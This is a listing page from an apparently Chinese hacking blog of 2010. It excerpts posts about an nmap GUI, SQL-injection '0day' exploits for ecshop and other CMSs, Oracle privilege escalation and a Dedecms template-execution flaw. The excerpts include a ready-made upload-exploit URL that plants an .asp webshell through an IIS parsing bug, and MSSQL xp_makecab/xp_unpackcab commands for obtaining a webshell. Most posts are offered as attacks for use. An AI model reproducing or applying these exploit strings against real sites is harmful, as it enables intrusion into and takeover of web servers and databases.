NmapSi4是一个完全基于Qt4的图形界面,它的主要目的是为nmap扫描器提供一个完全的用户接口,在图形界面上管理nmap这个强大的网络安全扫描工具的所有选项。目前发布了 0.2 beta 3版,该版本主要改变如下:
•DONE:: static thread debug define
•DONE:: | Feature | save scan parameters on bookmark
•DONE:: | Feature | scan monitor progressBar rework
黑面小窝
欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~
2010年8月23日
Nmap图形界面(GUI) - NmapSi4
Tags: tool
发布:admin | 分类:常用工具 | 评论:0 | 引用:0 | 浏览:
2010年8月23日
凹丫丫新闻发布系统ACC版SQL版最新通杀注入0day
作者:enjoyhack
系统主要漏洞是cookie注入,总的有两处,我们先来看看防注入代码:
<%
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name
'------定义部份 头----------------------------------------------------------------------
Tags: 注入 漏洞
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月23日
深度学习asp整站系统oday
序:深度学习asp整站系统
版本:Ver3.5.1,之前的版本未测试,不过应该存在相同的漏洞吧
漏洞:上传漏洞,ewebeditor编辑器利用
ewebeditor编辑器地址 \admin\include\eWebEditor 这个大家都知道的
上传漏洞的话,配合IIS解析漏洞就可以了。
利用地址是:admin/include/upload_form.asp?action=add&MaxSize=512000&FileType=asa&SavePath=../../photo/uploadFile/photo/uploadfile/a.asp;aa&parentBackValue=form1.PhotoUrl&saveName=0
...Tags: 漏洞
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
aspx脚本链接各类数据库
转自:T00LS
方便大家使用
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
Tags: aspx tool
发布:admin | 分类:常用工具 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
ecshop SQL注射漏洞0821 0day+exp
漏洞标题: ecshop SQL注射漏洞
相关厂商: ecshop
漏洞作者: xsser
漏洞类型: SQL注射
...
Tags: php sql 注入
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
mssql2005注入
文/图 饭
Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键字的方法,如果仅仅过滤单引号或者小写类的关键字,则极易出现绕过的情形,而国内的安全公司相继推出的硬件WAF是否会存在同样的问题呢?从根本上说硬件WAF基于访问请求流量来鉴别攻击行为,可能在以后的攻防对立的演化过程也会慢慢有爆出被绕过的问题,所有的问题依然存在。本文试着在注入的SQL语句中不引用单引号,来和大家讨论一下注入攻击的部分原理和技巧。在一次测试中,发现一注入点过滤了单引号和小写的关键字,提交语句如下:
Tags: sql 注入
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月22日
linux和windows系统直连Oracle数据库注入提权和修复详解
作者:菜牛
收到约镐通知,刚好正研究ORACLE 课题,而国内网上相关主题不是很多,所以就写了此
文,本文详细演示了针对linux 和windows 两种主流操作系统的ORACLE 提权过程,希望
对想了解ORACLE 但又不知道从何入手的朋友有帮助。对于管理员来说,也可以参考此文
看自己的数据库有否存在文中漏洞。
orACLE 数据库简介:
orACLE 是以高级结构化查询语言(SQL)为基础的大型关系数据库,它使用SQL(Structured
Tags: Oracle 注入 提权
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月20日
3个MSSQL扩展,可用来获取WEBSHELL
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
打包
EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
解包,可以用于得到webshell
EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'
...
Tags: sql
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月20日
Dedecms <= V5.6 Final模板执行漏洞
影响版本:
dedecms V5.6 Final
漏洞描述:
Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。
